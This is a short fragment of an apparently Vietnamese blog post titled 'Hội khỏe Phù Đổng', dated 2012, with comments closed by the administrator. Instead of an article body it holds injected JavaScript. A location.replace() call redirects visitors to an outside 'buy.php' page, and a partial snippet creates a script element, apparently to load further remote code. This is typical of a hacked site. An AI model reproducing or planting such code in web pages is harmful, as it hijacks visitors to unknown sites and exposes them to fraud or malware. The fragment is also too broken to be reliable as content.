Hội khỏe Phù Đổng

22/02/2012 3:51 Sáng Phản hồi đã bị khóa

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Các phản hồi đã bị đóng lại bở quản trị.